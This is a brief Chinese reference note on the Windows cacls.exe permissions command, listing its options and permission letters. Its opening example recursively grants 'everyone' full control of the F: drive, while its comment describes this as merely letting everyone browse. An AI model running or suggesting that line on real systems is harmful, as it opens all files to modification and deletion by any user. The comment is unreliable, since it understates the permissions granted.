cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user […]]
[/P user:perm […]] [/D user […]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
在命令中可以使用通配符指定多个文件。